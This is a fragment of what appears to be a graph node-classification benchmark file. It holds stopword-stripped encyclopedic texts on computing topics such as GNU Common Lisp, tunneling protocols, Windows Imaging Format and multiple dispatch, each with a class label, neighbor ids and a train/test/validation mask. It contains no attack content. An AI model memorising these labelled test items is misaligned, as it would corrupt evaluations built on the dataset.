    "text": "GNU_Common_Lisp:gnu common lisp gnu common lisp gcl gnu project ansi common lisp compiler evolutionary development kyoto common lisp produces native object code first generating c code calling c compiler gcl implementation choice several large projects including mathematical tools maxima axiom hol88 acl2 gcl runs eleven different architectures linux freebsd solaris mac os x microsoft windows gcl remains active development stable releases 2014-10-28 prerelease development followed using git revision control system",
    "neighbors": [
      10752,
      2050,
      11269,
      2062,
      9231,
      9749,
      8728,
      4633,
      4122,
      3618,
      8226,
      2105,
      6201,
      6717,
      8258,
      8771,
      10822,
      5703,
      1613,
      9299,
      3674,
      3675,
      7267,
      8293,
      3176,
      2666,
      2667,
      8304,
      5751,
      7805,
      2180,
      6797,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      5833,
      8908,
      205,
      7896,
      10463,
      7392,
      7904,
      10464,
      11488,
      5360,
      5361,
      8435,
      8436,
      6906,
      4865,
      3334,
      6919,
      11028,
      1301,
      5397,
      10012,
      3869,
      2335,
      802,
      7983,
      10547,
      823,
      311,
      6969,
      11083,
      1365,
      2392,
      6493,
      10083,
      6502,
      9579,
      1394,
      1397,
      3446,
      4992,
      2438,
      11654,
      7562,
      4493,
      1939,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      9128,
      5555,
      9148,
      10687,
      5569,
      6594,
      4550,
      11218,
      8147,
      10712,
      2010,
      3034,
      3051,
      9714,
      11255,
      2045,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 9866,
    "label": 9,
    "text": "Andrew_Appel:andrew appel andrew wilson appel born 1960 eugene higgins professor computer science princeton university new jersey especially well-known compiler books modern compiler implementation ml series well compiling continuations also major contributor standard ml new jersey compiler along david macqueen john h. reppy matthias blume others one authors rog-o-matic andrew appel son mathematician kenneth appel proved four-color theorem 1976 appel gained a.b summa cum laude physics princeton university 1981 ph.d. computer science carnegie-mellon university 1985 became acm fellow 1998 due research programming languages compilers 1981 appel developed better approach n-body problem linearithmic instead quadratic time july 2005 july 2006 visiting researcher institut national de recherche en informatique et en automatique inria rocquencourt france sabbatical princeton university andrew appel campaigns issues related interaction law computer technology testified penalty phase microsoft antitrust case 2002 opposed introduction computerized voting machines deemed untrustworthy 2007 received attention purchased number voting machines purpose investigating security",
    "neighbors": [
      1952,
      6817,
      8587,
      5783,
      10584,
      10395,
      8924
    ],
    "mask": "Test"
  },
  {
    "node_id": 9867,
    "label": 1,
    "text": "Oracle_Enterprise_Manager:oracle enterprise manager oracle enterprise manager oem em set web-based tools aimed managing software hardware produced oracle corporation well non-oracle entities oracle enterprise manager includes three releases oracle enterprise manager database control oldest arguably best-known release aims manage oracle databases originated java client able configure manage databases oracle application server also web-interface manage application server managing lots databases application servers according oracle corporation preferably grid solution one could use oracle enterprise manager grid control manage multiple instances oracle deployment platforms recent edition also allows management monitoring platforms microsoft .net microsoft sql server netapp filers bea weblogic others partners organizations build extensions oracle enterprise manager make available enterprise manager users via oracle hosted web site called oracle enterprise manager extensibility exchange system monitoring features include monitoring functionality supports detection notification impending problems monitors oracle database instances oracle real application clusters oracle application server farms clusters oem grid control comes set performance health metrics allow monitoring technology components applications application servers databases well back-end components rely hosts operating systems storage architecture oem grid control three distinct components oma runs target host collects information hardware operating system applications run target oms runs one two servers collects data generated omas oms pulls information omas aggregates collections repository oms also acts user-interface — generating web-pages database administrators view status systems services omr comprises instance oracle database stores data collected oms installers make omr highly available fault-tolerant running oracle rac instance across multiple nodes plug-ins omas customise manipulate data presented oem extending data omas collect administrators customize analysis data management packs look specific collections data display system performance release oem allows design configuration custom plug-ins monitor application desired omas collect data using custom-built plug-in transmit results xml format back oms stores analyzes data desired oracle enterprise manager continues expand monitoring scope offering management plug-ins non-oracle components oracle-developed developed partnership third-party vendors example plug-ins veritas storage foundation vmware vsphere emc clariion available key features oem grid control oracle release since 13c oracle enterprise manager performs much activity intelligent agents oracle corporation refers oracle management agents run autonomous proxy processes managed node perform execution monitoring tasks oracle enterprise manager communicating using hypertext transfer protocol http https default upon installation oma enables several packs change management performance tuning diagnostics configuration management without regard customer licensed users need de-select unlicensed packs installing agent target database oem uses default codice_1 schema oracle database super-administrator account/repository utility programs codice_2 codice_3 carry actual functions oem also provides command-line alternative emcli em command line interface verbs provide functionality ui-based em",
    "neighbors": [
      11136,
      6433,
      4194,
      5956,
      10340,
      8871,
      10553,
      4233,
      4490,
      6993,
      11030,
      9112,
      9177,
      1755,
      4797
    ],
    "mask": "Test"
  },
  {
    "node_id": 9868,
    "label": 4,
    "text": "Tunneling_protocol:tunneling protocol computer networks tunneling protocol communications protocol allows movement data one network another involves allowing private network communications sent across public network internet process called encapsulation tunneling involves repackaging traffic data different form perhaps encryption standard hide nature traffic run tunnel tunneling protocol works using data portion packet payload carry packets actually provide service tunneling uses layered protocol model osi tcp/ip protocol suite usually violates layering using payload carry service normally provided network typically delivery protocol operates equal higher level layered model payload protocol tunneling protocol may example allow foreign protocol run network support particular protocol running ipv6 ipv4 another important use provide services impractical unsafe offered using underlying network services providing corporate network address remote user whose physical network address part corporate network users also use tunneling sneak firewall using protocol firewall would normally block wrapped inside protocol firewall block http firewall policy specifically exclude kind wrapping trick function get around intended firewall policy set interlocked firewall policies another http-based tunneling method uses http connect method/command client issues http connect command http proxy proxy makes tcp connection particular server port relays data server port client connection creates security hole connect-capable http proxies commonly restrict access connect method proxy allows connections specific ports 443 https example network layer network layer generic routing encapsulation gre protocol running ip ip protocol number 47 often serves carry ip packets rfc 1918 private addresses internet using delivery packets public ip addresses case delivery payload protocols payload addresses incompatible delivery network also possible establish connection using data link layer layer 2 tunneling protocol l2tp allows transmission frames two nodes tunnel encrypted default relies tcp/ip protocol chosen determine level security ssh uses port 22 enable data encryption payloads transmitted public network internet connection thereby providing vpn functionality ipsec end-to-end transport mode also operate tunneling mode trusted security gateway understand particular protocol stack imposed tunneling network engineers must understand payload delivery protocol sets secure shell ssh tunnel consists encrypted tunnel created ssh protocol connection users may set ssh tunnels transfer unencrypted traffic network encrypted channel example microsoft windows machines share files using server message block smb protocol non-encrypted protocol one mount microsoft windows file-system remotely internet someone snooping connection could see transferred files mount windows file-system securely one establish ssh tunnel routes smb traffic remote fileserver encrypted channel even though smb protocol contains encryption encrypted ssh channel travels offers security ssh connection established tunnel starts ssh listening port remote local host connections forwarded specified address port originating opposing remote local previously host tunneling tcp- encapsulating payload ppp tcp-based connection ssh port forwarding known tcp-over-tcp induce dramatic loss transmission performance problem known tcp meltdown virtual private network software may instead use protocol simpler tcp tunnel connection however often problem using openssh port forwarding many use cases entail tcp-over-tcp tunneling meltdown avoided openssh client processes local client-side tcp connection order get actual payload sent sends payload directly tunnel tcp connection server side openssh server similarly unwraps payload order wrap routing final destination naturally wrapping unwrapping also occurs reverse direction bidirectional tunnel ssh tunnels provide means bypass firewalls prohibit certain internet services long site allows outgoing connections example organization may prohibit user accessing internet web pages port 80 directly without passing organization proxy filter provides organization means monitoring controlling user sees web users may wish web traffic monitored blocked organization proxy filter users connect external ssh server create ssh tunnel forward given port local machine port 80 remote web server access remote web server users would point browser local port nowiki http //localhost/ /nowiki ssh clients support dynamic port forwarding allows user create socks 4/5 proxy case users configure applications use local socks proxy server gives flexibility creating ssh tunnel single port previously described socks free user limitations connecting predefined remote port server application n't support socks proxifier used redirect application local socks proxy server proxifiers proxycap support ssh directly thus avoiding need ssh client recent versions openssh even allowed create layer 2 layer 3 tunnels ends enabled tunneling capabilities creates codice_1 layer 3 default codice_2 layer 2 virtual interfaces ends connection allows normal network management routing used used routers traffic entire subnetwork tunneled pair codice_2 virtual interfaces function like ethernet cable connecting ends connection join kernel bridges",
    "neighbors": [
      10242,
      1030,
      6152,
      11,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      3620,
      2085,
      7208,
      3629,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6719,
      6723,
      8265,
      4687,
      1618,
      10341,
      10344,
      3695,
      4723,
      5749,
      2679,
      4729,
      10873,
      5251,
      649,
      1164,
      3218,
      9365,
      11413,
      152,
      1692,
      3742,
      9380,
      9381,
      3751,
      3752,
      7337,
      172,
      10924,
      6318,
      7855,
      7859,
      2228,
      9909,
      1208,
      4793,
      7865,
      4797,
      702,
      7364,
      8391,
      8905,
      9930,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      3322,
      2306,
      9987,
      3847,
      4369,
      10005,
      5402,
      5405,
      8998,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      3399,
      10055,
      10058,
      1867,
      7502,
      849,
      6993,
      1876,
      11606,
      2904,
      7003,
      5469,
      5470,
      5471,
      2912,
      5472,
      10589,
      3428,
      871,
      11112,
      361,
      2413,
      5486,
      367,
      891,
      6524,
      1406,
      11647,
      10115,
      5516,
      6541,
      7570,
      4504,
      11162,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      2509,
      8666,
      8669,
      8670,
      10723,
      10727,
      8682,
      3564,
      6651,
      3580,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 9869,
    "label": 6,
    "text": "Live_File_System:live file system live file system term microsoft uses describe packet writing method creating discs windows vista later allows files added incrementally media discs use udf file system live file system option used default autoplay formatting/erasing cd/dvd -r -rw older windows versions support reading latest udf versions users create dvd/cds windows vista using udf 2.50 may readable systems including windows xp older pre-mac os 10.5 apple systems unless third-party udf reader driver installed ensure compatibility disks created windows vista udf 2.01 lower selected",
    "neighbors": [
      9762,
      6797,
      2221,
      6062,
      7290,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 9870,
    "label": 5,
    "text": "Phase-fired_controller:phase-fired controller phase-fired control pfc also called phase cutting phase angle control method power limiting applied ac voltages works modulating thyristor scr triac thyratron gated diode-like devices conduction predetermined phase applied waveform phase-fired control pfc often used control amount voltage current power power supply feeds load create average value output supply dc output time base importance deciding pulse supply value pulsed continuous pfc differs pulse-width modulation pwm addresses supplies output modulated waveform sinusoidal ac waveform national grid outputs becomes important supply pulse correct position modulation cycle known value achieved example controller could turn peak waveform base cycle time base taken consideration phase-fired controllers take name fact trigger pulse output certain phase input modulation cycle essence pfc controller synchronise modulation present input phase-fired controllers use thyristors solid state switching devices control elements thyristor-based controllers may utilise gate turn-off gto thyristors allowing controller decide switch output turn rather wait waveform return zero phase-fired controller like buck topology switched-mode power supply able deliver output maximum equal present input minus losses occurring control elements provided modulation cycle predictable repetitive national grid ac mains obtain output lower input phase-fired control simply switches given phase angle input modulation cycle triggering device conduction phase angle greater 0 degrees point modulation cycle starts fraction total energy within cycle present output achieve boost -like effect pfc designs must derated maximum present input higher nominal output requirements supply first turned operating nominal conditions controller continually delivering less 100 input boost required controller delivers percentage closer 100 maximum input available derating mains powered phase-fired controllers important often used control resistive loads heating elements time resistance heating elements increase account phase-fired control must able provide degree extra voltage draw heating current element way achieving purposely design supply require less 100 input modulation cycle elements first put place progressively opening supply towards delivering 100 input modulation cycle elements age common application dimmer switches domestic lighting control industrial applications previously extremely expensive heavy multi-tapped transformers used supplies elements corresponding winding tap connected element produce desired temperature limited temperature resolution number tap combinations available often find way controllers designed equipment electric ovens furnaces modern usually high power equipment transformer replaced phase-fired controllers connecting load directly mains resulting substantially cheaper lighter system however method usually limited use equipment would unrealistic without removal mains transformer means load electrical continuity input industrial ovens furnaces input often national grid ac electrically referenced ground controller output referenced ground user need contact earth one output terminals risk receiving electrical shock many high-power items equipment running three-phase 415 v high current inputs enclosure framework present earthed grounded serious risk must carefully assessed first patent phase-fired controllers derives 1912 however realization first possible 1920s mercury-arc valve rectifiers control grids became available however method voltage regulation common time limitations mercury arc valves became widespread invention solid-state thyristors end 1950s burst-fired controllers",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9871,
    "label": 9,
    "text": "Syntax_(programming_languages):syntax programming languages computer science syntax computer language set rules defines combinations symbols considered correctly structured document fragment language applies programming languages document represents source code markup languages document represents data syntax language defines surface form text-based computer languages based sequences characters visual programming languages based spatial layout connections symbols may textual graphical documents syntactically invalid said syntax error.when designing syntax language designer starts writing examples legal illegal strings trying figure general rules examples syntax therefore refers form contrasted semantics – meaning processing computer languages semantic processing generally comes syntactic processing however cases semantic processing necessary complete syntactic analysis done together concurrently compiler syntactic analysis comprises frontend semantic analysis comprises backend middle end phase distinguished computer language syntax generally distinguished three levels distinguishing way yields modularity allowing level described processed separately often independently first lexer turns linear sequence characters linear sequence tokens known lexical analysis lexing second parser turns linear sequence tokens hierarchical syntax tree known parsing narrowly speaking thirdly contextual analysis resolves names checks types modularity sometimes possible many real-world languages earlier step depends later step – example lexer hack c tokenization depends context even cases syntactical analysis often seen approximating ideal model parsing stage divided two parts parse tree concrete syntax tree determined grammar generally far detailed practical use abstract syntax tree ast simplifies usable form ast contextual analysis steps considered form semantic analysis adding meaning interpretation syntax alternatively informal manual implementations syntactical rules would difficult awkward describe implement formally levels generally correspond levels chomsky hierarchy words regular language specified lexical grammar type-3 grammar generally given regular expressions phrases context-free language cfl generally deterministic context-free language dcfl specified phrase structure grammar type-2 grammar generally given production rules backus–naur form bnf phrase grammars often specified much constrained grammars full context-free grammars order make easier parse lr parser parse dcfl linear time simple lalr parser even simpler parser efficient parse grammars whose production rules constrained principle contextual structure described context-sensitive grammar automatically analyzed means attribute grammars though general step done manually via name resolution rules type checking implemented via symbol table stores names types scope tools written automatically generate lexer lexical specification written regular expressions parser phrase grammar written bnf allows one use declarative programming rather need procedural functional programming notable example lex-yacc pair automatically produce concrete syntax tree parser writer must manually write code describing converted abstract syntax tree contextual analysis also generally implemented manually despite existence automatic tools parsing often implemented manually various reasons – perhaps phrase structure context-free alternative implementation improves performance error-reporting allows grammar changed easily parsers often written functional languages haskell scripting languages python perl c c++ example codice_1 syntactically valid lisp program assuming 'add function exists else name resolution fails adding 1 1 however following invalid note lexer unable identify first error – knows producing token left_paren remainder program invalid since word rule begins second error detected parsing stage parser identified list production rule due token match thus give error message general may ambiguous type errors undeclared variable errors sometimes considered syntax errors detected compile-time usually case compiling strongly-typed languages though common classify kinds error semantic errors instead example python code contains type error adds string literal integer literal type errors kind detected compile-time detected parsing phrase analysis compiler uses separate rules allow integerliteral integerliteral stringliteral integerliteral though likely compiler use parsing rule allows expressions form literaloridentifier literaloridentifier error detected contextual analysis type checking occurs cases validation done compiler errors detected runtime dynamically typed language type determined runtime many type errors detected runtime example python code syntactically valid phrase level correctness types b determined runtime variables types python values whereas disagreement whether type error detected compiler called syntax error rather static semantic error type errors detected program execution time always regarded semantic rather syntax errors syntax textual programming languages usually defined using combination regular expressions lexical structure backus–naur form grammatical structure inductively specify syntactic categories nonterminals terminal symbols syntactic categories defined rules called productions specify values belong particular syntactic category terminal symbols concrete characters strings characters example keywords define let void syntactically valid programs constructed language different equivalent grammars equivalent regular expressions lexical levels different phrase rules generate language using broader category grammars lr grammars allow shorter simpler grammars compared restricted categories grammar may require longer grammars rules different equivalent phrase grammars yield different parse trees though underlying language set valid documents simple grammar defined using notation regular expressions extended backus–naur form describes syntax s-expressions data syntax programming language lisp defines productions syntactic categories expression atom number symbol list grammar specifies following decimal digits upper- lower-case characters parentheses terminal symbols following examples well-formed token sequences grammar 'codice_2 'codice_3 'codice_4' grammar needed specify programming language classified position chomsky hierarchy phrase grammar programming languages specified using type-2 grammar i.e. context-free grammars though overall syntax context-sensitive due variable declarations nested scopes hence type-1 however exceptions languages phrase grammar type-0 turing-complete languages like perl lisp specification implementation language allows constructs execute parsing phase furthermore languages constructs allow programmer alter behavior parser combination effectively blurs distinction parsing execution makes syntax analysis undecidable problem languages meaning parsing phase may finish example perl possible execute code parsing using codice_5 statement perl function prototypes may alter syntactic interpretation possibly even syntactic validity remaining code colloquially referred perl parse perl code must executed parsing modify grammar strongly even perl parse perl undecidable similarly lisp macros introduced codice_6 syntax also execute parsing meaning lisp compiler must entire lisp run-time system present contrast c macros merely string replacements require code execution syntax language describes form valid program provide information meaning program results executing program meaning given combination symbols handled semantics either formal hard-coded reference implementation syntactically correct programs semantically correct many syntactically correct programs nonetheless ill-formed per language rules may depending language specification soundness implementation result error translation execution cases programs may exhibit undefined behavior even program well-defined within language may still meaning intended person wrote using natural language example may possible assign meaning grammatically correct sentence sentence may false following c language fragment syntactically correct performs operation semantically defined p null pointer operations p- real p- im meaning simpler example syntactically valid semantically defined uses uninitialized variable even though compilers programming languages e.g. java c would detect uninitialized variable errors kind regarded semantic errors rather syntax errors quickly compare syntax various programming languages take look list hello world program examples",
    "neighbors": [
      5635,
      3462,
      8582,
      6536,
      1931,
      2316,
      1552,
      10387,
      3221,
      6933,
      5399,
      1277,
      1435,
      7580,
      8221,
      1952,
      5537,
      1956,
      805,
      3876,
      4516,
      5415,
      4777,
      428,
      5677,
      1203,
      9780,
      7479,
      10560,
      963,
      6596,
      7237,
      7876,
      8262,
      8773,
      5449,
      5833,
      9290,
      10435,
      10568,
      846,
      847,
      7889,
      7634,
      8531,
      5588,
      6228,
      6102,
      9299,
      11218,
      219,
      477,
      8289,
      11490,
      7395,
      356,
      5733,
      7805,
      7274,
      8554,
      9454,
      10097,
      3960,
      1147,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 9872,
    "label": 2,
    "text": "Gamin:gamin gamin monitoring system files directories independently implements subset fam file alteration monitor running service allows detection modifications file directory gam_server functions daemon gamin word gamin french also female form gamine refers boy gamin project built earlier project called marmot french means child brat linux gamin uses inotify dnotify monitor filesystem activity freebsd gamin uses kqueue/kevent native freebsd kernel event notification mechanism case kqueue one major drawback compared inotify inotify filename-based monitoring facility kqueue uses file descriptors identification monitored files freebsd gam_server open file monitored directory issue monitoring directories many files stored system could easily reach kernel limits maximum file descriptor count kern.maxfiles kern.maxfilesperproc",
    "neighbors": [
      2432,
      11394,
      2955,
      6413,
      10255,
      8848,
      3859,
      7450,
      6813,
      1822,
      11293,
      6691,
      6694,
      8621,
      7983,
      9908,
      823,
      708,
      3015,
      4177,
      2021,
      4459,
      5492,
      2044
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9873,
    "label": 2,
    "text": "Knopperdisk:knopperdisk knopperdisk operating system specifically designed usb pen drive floppy disks knopperdisk fairly minimal text system used rescue disk although usb pen drive version software packages installed used different purposes despite similarity name knoppix based gentoo linux",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 9874,
    "label": 2,
    "text": "Windows_Imaging_Format:windows imaging format windows imaging format wim file-based disk image format developed microsoft help deploy windows vista subsequent versions windows operating system family well windows fundamentals legacy pcs like disk image formats wim file contains set files associated filesystem metadata however unlike sector-based formats iso vhd wim file-based fundamental unit information wim file primary advantages file-based hardware independence single-instance storage file referenced multiple times filesystem tree since files stored inside single wim file overhead opening closing many individual files reduced cost reading writing many thousands individual files local disk negated hardware software-based disk caching well sequential reading writing data wim files contain multiple disk images referenced either numerical index unique name due use single-instance storage successive disk image common previous images added wim file less new data added wim also split spanned multiple parts .swm extension wim images made bootable windows boot loader supports booting windows within wim file windows setup dvd windows vista later use wim files case boot.wim contains bootable version windows pe installation performed setup files held install.wim imagex command-line tool used create edit deploy windows disk images windows imaging format distributed part free windows automated installation kit waik starting windows vista windows setup uses waik api install windows first distributed prototype imagex build 6.0.4007.0 main.030212-2037 allowed microsoft oem partners experiment imaging technology developed parallel longhorn alpha prototypes first introduced milestone 4 longhorn project used later builds longhorn build 6.0.5384.4 added significant advantages previous versions like read-only read/write folder mounting capabilities splitting multiple image files swm wim filter driver latest lzx compression algorithms used since pre-rc release candidates windows vista deployment image service management tool dism tool introduced windows 7 windows server 2008 r2 perform servicing tasks windows installation image online image i.e one user running offline image within folder wim file features include mounting unmounting images querying installed device drivers offline image adding device driver offline image possible repair dism image using either windows installation cd windows update windows server 2012 windows 8 dism incorporated majority imagex functions imagex still needed image capture however dism deprecated imagex windows 8 since april 30 2012 open source library handling wim format available library used unix-like systems well windows thanks project gnu/linux distributions imagex clone called wimlib-imagex allows mounting wim images managing read/write like file system wim images basically using lzx compression algorithm accessed using file archivers like 7-zip operating systems might support format still possible convert .wim images commonly used iso image using windows assessment deployment kit windows",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      11301,
      1577,
      3114,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      7254,
      10839,
      603,
      9819,
      3170,
      10857,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      651,
      6797,
      2193,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      9910,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9953,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10476,
      10993,
      3315,
      3834,
      2811,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      8499,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3921,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      2432,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      950,
      9655,
      6584,
      1978,
      960,
      7106,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      8676,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9875,
    "label": 9,
    "text": "Multiple_dispatch:multiple dispatch multiple dispatch multimethods feature programming languages function method dynamically dispatched based run time dynamic type general case attribute one arguments generalization single dispatch polymorphism function method call dynamically dispatched based derived type object method called multiple dispatch routes dynamic dispatch implementing function method using combined characteristics one arguments developers computer software typically organize source code named blocks variously called subroutines procedures subprograms functions methods code function executed calling – executing piece code references name transfers control temporarily called function function execution completed control typically transferred back instruction caller follows reference function names usually selected descriptive function purpose sometimes desirable give several functions name often perform conceptually similar tasks operate different types input data cases name reference function call site sufficient identifying block code executed instead number type arguments function call also used select among several function implementations conventional i.e. single-dispatch object-oriented programming languages invoking method sending message smalltalk calling member function c++ one arguments treated specially used determine potentially many methods name applied many languages special argument indicated syntactically example number programming languages put special argument dot making method call codice_1 codice_2 would produce roar whereas codice_3 would produce cheep contrast languages multiple dispatch selected method simply one whose arguments match number type function call special argument owns function/method carried particular call common lisp object system clos early well-known example multiple dispatch working languages discriminate data types compile time selecting among alternatives occur act creating alternative functions compile time selection usually referred overloading function programming languages defer data type identification run time i.e. late binding selection among alternative functions must occur based dynamically determined types function arguments functions alternative implementations selected manner referred generally multimethods run time cost associated dynamically dispatching function calls languages distinction overloading multimethods blurred compiler determining whether compile time selection applied given function call whether slower run time dispatch needed estimate often multiple dispatch used practice muschevici et al studied programs use dynamic dispatch analyzed nine applications mostly compilers written six different languages common lisp object system dylan cecil multijava diesel nice results show 13–32 generic functions use dynamic type one argument 2.7–6.5 use dynamic type multiple arguments remaining 65–93 generic functions one concrete method overrider thus considered use dynamic types arguments study reports 2–20 generic functions two 3–6 three concrete function implementations numbers decrease rapidly functions concrete overriders multiple dispatch used much heavily julia multiple dispatch central design concept origin language collecting statistics muschevici average number methods per generic function found julia standard library uses double amount overloading languages analyzed muschevici 10 times case binary operators data papers summarized following table dispatch ratio codice_4 average number methods per generic function choice ratio codice_5 mean square number methods better measure frequency functions large number methods degree specialization dos average number type-specialized arguments per method i.e. number arguments dispatched theory multiple dispatching languages first developed castagna et al. defining model overloaded functions late binding yielded first formalization problem covariance contravariance object-oriented languages solution problem binary methods distinguishing multiple single dispatch may made clearer example imagine game among user-visible objects spaceships asteroids two objects collide program may need different things according hit language multiple dispatch common lisp might look like common lisp example shown similarly methods explicit testing dynamic casting used presence multiple dispatch traditional idea methods defined classes contained objects becomes less appealing—each collide-with method attached two different classes one hence special syntax method invocation generally disappears method invocation looks exactly like ordinary function invocation methods grouped classes generic functions julia built-in multiple dispatch central language design julia version example might look like collide_with x :asteroid :asteroid ... deal asteroid hitting asteroid collide_with x :asteroid :spaceship ... deal asteroid hitting spaceship collide_with x :spaceship :asteroid ... deal spaceship hitting asteroid collide_with x :spaceship :spaceship ... deal spaceship hitting spaceship perl 6 like past versions uses proven ideas languages type systems shown offer compelling advantages compiler-side code analysis powerful user-side semantics via multiple dispatch multimethods multisubs since operators subroutines also multiple dispatched operators along usual type constraints also constraints allow making specialized subroutines subset mass real 0 ^..^ inf role stellar-object class asteroid stellar-object class spaceship stellar-object str destroyed obliterated destroyed mangled str damaged « damaged 'collided 'was damaged » multi sub infix « » stellar-object stellar-object b a.mass b.mass proto sub collide stellar-object stellar-object multi sub collide b b multi sub collide b b multi sub collide b multi sub collide spaceship spaceship b == b multi sub collide asteroid mass asteroid mass b spaceship enterprise .= new mass 1 :name 'the enterprise collide asteroid.new mass .1 enterprise collide enterprise spaceship.new mass .1 collide enterprise asteroid.new mass 1 collide enterprise spaceship.new mass 1 collide asteroid.new mass 10 asteroid.new mass 5 languages support multiple dispatch language definition syntactic level python often possible add multiple dispatch using library extension example module multimethods.py provides clos-style multimethods python without changing underlying syntax keywords language multimethods import dispatch game_objects import asteroid spaceship game_behaviors import asfunc ssfunc safunc collide dispatch collide.add_rule asteroid spaceship asfunc collide.add_rule spaceship spaceship ssfunc collide.add_rule spaceship asteroid safunc def aafunc b collide.add_rule asteroid asteroid aafunc collide thing1 thing2 functionally similar clos example syntax conventional python using python 2.4 decorators guido van rossum produced sample implementation multimethods simplified syntax multimethod asteroid asteroid def collide b multimethod asteroid spaceship def collide b goes define multimethod decorator peak-rules package provides multiple dispatch syntax similar example later replaced pyprotocols reg library also supports multiple predicate dispatch c dynamic dispatch must implemented manually form often enum used identify subtype object dynamic dispatch done looking value function pointer branch table simple example c typedef void *collisioncase void void collision_aa void /* handle asteroid-asteroid collision */ void collision_as void /* handle asteroid-spaceship collision */ void collision_sa void /* handle spaceship-asteroid collision */ void collision_ss void /* handle spaceship-spaceship collision*/ typedef enum thing collisioncase collisioncases num_thing_types num_thing_types void collide thing thing b int main void c object system library c support dynamic dispatch similar clos fully extensible need manual handling methods dynamic message methods dispatched dispatcher cos faster objective-c example cos // classes defclass asteroid // data members endclass defclass spaceship // data members endclass // generics defgeneric _bool collide_with _1 _2 // multimethods defmethod _bool collide_with asteroid asteroid endmethod defmethod _bool collide_with asteroid spaceship endmethod defmethod _bool collide_with spaceship asteroid endmethod defmethod _bool collide_with spaceship spaceship endmethod // example use int main void c++ natively supports single dispatch though adding multi-dispatch considered methods working around limit analogous use either visitor pattern dynamic cast library pointer-to-method lookup table class thing class asteroid public thing class spaceship public thing thing :collisionhandlermap thing :collisioncases const std :uint32_t asteroid :cid typeid asteroid .hash_code const std :uint32_t spaceship :cid typeid spaceship .hash_code void asteroid :initcases void spaceship :initcases int main yomm2 library provides fast orthogonal implementation open multimethods syntax declaring open methods inspired proposal native c++ implementation library requires user registers classes used virtual arguments sub-classes require modifications existing code methods implemented ordinary inline c++ functions overloaded passed pointer limit number virtual arguments arbitrarily mixed non-virtual arguments library uses combination techniques compressed dispatch tables perfect integer hash implement method calls constant time mitigating memory usage dispatching call open method single virtual argument takes 15-30 time calling ordinary virtual member function modern optimizing compiler used asteroids example implemented follows using yorel :yomm2 :virtual_ class thing class asteroid public thing class spaceship public thing register_class thing register_class spaceship thing register_class asteroid thing declare_method void collidewith virtual_ thing virtual_ thing define_method void collidewith thing left thing right define_method void collidewith asteroid left asteroid right define_method void collidewith asteroid left spaceship right define_method void collidewith spaceship left asteroid right define_method void collidewith spaceship left spaceship right int main stroustrup mentions design evolution c++ liked concept multimethods considered implementing c++ claims unable find efficient sample implementation comparable virtual functions resolve possible type ambiguity problems states although feature would still nice approximately implemented using double dispatch type based lookup table outlined c/c++ example low priority feature future language revisions many object-oriented programming languages natively supports single dispatch however possible emulate open multimethods library function d. openmethods library example // declaration matrix plus virtual matrix virtual matrix // override two densematrix objects method matrix _plus densematrix densematrix b // override two diagonalmatrix objects method matrix _plus diagonalmatrix diagonalmatrix b language single dispatch java multiple dispatch emulated multiple levels single dispatch interface collideable class asteroid implements collideable class spaceship implements collideable run time codice_6 checks one levels also used also multi-parameter type classes haskell scala used emulate multiple dispatch",
    "neighbors": [
      8582,
      2062,
      9877,
      9245,
      10013,
      10145,
      11555,
      3876,
      5031,
      11688,
      5165,
      5677,
      10670,
      11574,
      6969,
      6074,
      10555,
      6718,
      10819,
      8262,
      5833,
      11219,
      2392,
      10841,
      11610,
      2011,
      11227,
      11488,
      11361,
      10083,
      6502,
      10729,
      2666,
      3051,
      7148,
      8554,
      10347,
      10739,
      2804,
      3573,
      3705,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9876,
    "label": 7,
